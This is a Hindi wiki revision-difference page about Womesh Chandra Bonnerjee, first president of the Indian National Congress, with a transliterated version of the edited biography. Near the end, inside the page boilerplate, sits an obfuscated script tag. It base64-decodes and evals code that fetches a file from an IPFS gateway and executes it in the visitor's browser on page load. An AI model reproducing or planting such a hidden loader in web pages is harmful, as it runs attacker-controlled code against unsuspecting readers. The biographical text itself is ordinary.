Difference between revisions of "व्योमेश चन्‍द्र बनर्जी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
वोमेश चन्‍द्र बनर्जी (जन्म- [[29 दिसंबर]], 1844, [[कोलकाता]]; मृत्यु- [[21 जुलाई]] [[1906]] [[इंग्लैंड]])। वोमेश चन्‍द्र बनर्जी [[भारतीय राष्ट्रीय कांग्रेस]] के प्रथम अध्यक्ष और [[कोलकाता]] उच्च न्यायालय के प्रमुख वक़ील थे। वे अंग्रेज़ी चाल-ढाल के कट्टर अनुयायी थे, अत: स्वयं अपने पारिवारिक नाम 'बनर्जी' का अंग्रेज़ीकरण करके उसे '''बोनर्जी''' कर दिया और अपने पुत्र का नाम भी 'शेली' रखा, लेकिन [[ह्रदय]] से वे सच्चे भारतीय थे। इसलिए भारतीय राष्ट्रीय कांग्रेस के [[1885]] ई. में हुए प्रथम अधिवेशन के वे अध्यक्ष चुने गये। उन्हें दुबारा भी [[इलाहाबाद]] में [[1892]] ई. में हुए कांग्रेस अधिवेशन का अध्यक्ष बनाया गया। [[1902]] ई. में वे [[इंग्लैंड]] जाकर बस गये। [[1906]] ई. में अपनी मृत्यु पर्यन्त भारतीय राष्ट्रीय कांग्रेस के आंदोलन को बढ़ावा देते रहे।
+
*वोमेश चन्‍द्र बनर्जी (जन्म- [[29 दिसंबर]], 1844, [[कोलकाता]]; मृत्यु- [[21 जुलाई]] [[1906]] [[इंग्लैंड]]) [[भारतीय राष्ट्रीय कांग्रेस]] के प्रथम अध्यक्ष और [[कोलकाता]] उच्च न्यायालय के प्रमुख वक़ील थे।  
 +
*वे अंग्रेज़ी चाल-ढाल के कट्टर अनुयायी थे, अत: स्वयं अपने पारिवारिक नाम 'बनर्जी' का अंग्रेज़ीकरण करके उसे '''बोनर्जी''' कर दिया और अपने पुत्र का नाम भी 'शेली' रखा, लेकिन [[ह्रदय]] से वे सच्चे भारतीय थे। इसलिए भारतीय राष्ट्रीय कांग्रेस के [[1885]] ई. में हुए प्रथम अधिवेशन के वे अध्यक्ष चुने गये। उन्हें दुबारा भी [[इलाहाबाद]] में [[1892]] ई. में हुए कांग्रेस अधिवेशन का अध्यक्ष बनाया गया।  
 +
*[[1902]] ई. में वे [[इंग्लैंड]] जाकर बस गये। [[1906]] ई. में अपनी मृत्यु पर्यन्त भारतीय राष्ट्रीय कांग्रेस के आंदोलन को बढ़ावा देते रहे।
 +
 
 
{{लेख प्रगति
 
{{लेख प्रगति
 
|आधार=आधार1
 
|आधार=आधार1
Line 7: Line 10:
 
|शोध=
 
|शोध=
 
}}
 
}}
 +
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
[[Category:नया पन्ना]]
+
[[Category:नया पन्ना]]  
 
__INDEX__
 
__INDEX__

Revision as of 09:44, 27 November 2010

  • vomesh chanh‍dr banarji (janm- 29 disanbar, 1844, kolakata; mrityu- 21 julaee 1906 ianglaiand) bharatiy rashtriy kaangres ke pratham adhyaksh aur kolakata uchch nyayalay ke pramukh vaqil the.
  • ve aangrezi chal-dhal ke kattar anuyayi the, at: svayan apane parivarik nam 'banarji' ka aangrezikaran karake use bonarji kar diya aur apane putr ka nam bhi 'sheli' rakha, lekin hraday se ve sachche bharatiy the. isalie bharatiy rashtriy kaangres ke 1885 ee. mean hue pratham adhiveshan ke ve adhyaksh chune gaye. unhean dubara bhi ilahabad mean 1892 ee. mean hue kaangres adhiveshan ka adhyaksh banaya gaya.
  • 1902 ee. mean ve ianglaiand jakar bas gaye. 1906 ee. mean apani mrityu paryant bharatiy rashtriy kaangres ke aandolan ko badhava dete rahe.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh